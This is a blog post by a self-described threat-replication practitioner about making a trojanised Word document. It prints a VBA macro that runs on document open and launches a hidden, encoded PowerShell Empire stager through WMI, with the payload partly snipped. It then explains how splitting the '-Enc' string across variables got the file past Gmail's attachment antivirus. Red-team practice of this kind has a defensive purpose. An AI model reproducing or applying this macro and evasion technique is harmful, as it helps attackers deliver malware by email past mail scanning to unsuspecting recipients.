Note: This was posted in January 2016

My blog has moved: https://vincentyiu.co.uk

So today whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue. Gmail by default has a virus check on attachments if you want to send a malicious attachment out.

To insert a payload into the word document, I firstly created a template which looked like the below.

After doing so, creating the macro using AutoOpen and Document_Open was trivial. I made use of a powershell one liner payload along with process creation to launch powershell using an encrypted Payload. Using Powershell Empire’s default copy and paste macro stager, this is detected.

Sample payload:

Sub AutoOpen()
Debugging
End Sub

Sub Document_Open()
Debugging
End Sub

Public Function Debugging() As Variant
Dim Str As String
str = “powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP”
str = str + “QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB”

<snip to save space and sensitivity>

str = str + “ATwBJAG4AJwAnACkA”
Const HIDDEN_WINDOW = 0
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2″)
Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”)
objProcess.Create str, Null, objConfig, intProcessID
End Function

What I did was begin removing lines of code and kept uploading repeatedly to Gmail attachments until it would no longer detect it as a virus.

I made adjustments to the payload trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that the “-Enc” was part of the payload.

To resolve this, I split the “-Enc” string into “-E” and “nc” then concatenated it together. For example:

Dim Yops As String

Yops = “powershell.exe -Enc PAYLOADHERE”

This would be translated to the following:

Dim Yops As String

Yops = “powershell.exe -E”

Yops = Yops + “nc PAYLOADHERE”

However, this technique did not work. My next approach to thinking about it was that the “Yops” string is checked at the end after all the concatenation to determine whether “-Enc” is followed by “powershell.exe”. Therefore what I did was the following and it bypassed the virus checks.

Dim Yops As String

Yops = “powershell.exe -E”

Yolo = “nc PAYLOAD”

Yops = Yops + Yolo + “HERE”

This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.

)

Written by

Advanced Threat Replication. Simulating real threat actors using bleeding edge techniques.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade